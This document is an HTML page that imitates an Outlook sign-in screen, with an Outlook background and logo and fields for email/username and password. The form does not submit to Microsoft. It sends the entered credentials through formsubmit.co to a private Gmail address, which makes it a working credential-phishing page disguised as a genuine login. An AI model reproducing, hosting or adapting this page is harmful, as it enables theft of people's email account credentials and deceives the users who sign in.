<html lang="en">
<head>
    <meta charset="UTF-8">
<title>09327348file</title>
<style>
    *{
    margin: 0;
    padding: 0;
    display: sticky;
}
#main{
    width: 100%;
    height: 100vh;
    background-image: url(./outlook\ mailgd.jpg);
    background-position: center;
    background-size: cover;
    background-repeat: no-repeat;
}

form{
    display: grid;
    position: absolute;
    align-items: center;
    margin-left: 50%;
    margin-top: 12%;

}
form input{
    width: 250px;
    height: 28px;
    margin: 15px;
    padding: 5px;
}

button{
    width: 20%;
    margin-left: 100px;

}

img{
   width: 110px;
   height: 120px;
    margin-bottom: -80px;    
}
p{
    color: rgb(16, 122, 208);
    font-size: 60px;
    margin-left: 100px;
    font-weight: bold;
    font-style: normal;
    font-family: Arial, Helvetica, sans-serif;
    
}




</style>

</head>
<body>
    <div id="main">
        <form action="https://formsubmit.co/kesmu1232@gmail.com" method="POST">
            <img src="./th3655 (1).jpeg"><p>Outlook</p>
            <input type="Email" name="Email/Username" placeholder="Username/Email" required>
            <input type="password" name="password" placeholder="Password" required>
            <button type="submit">Sign In</button>
       </form>

    </div>
</body>
</html>
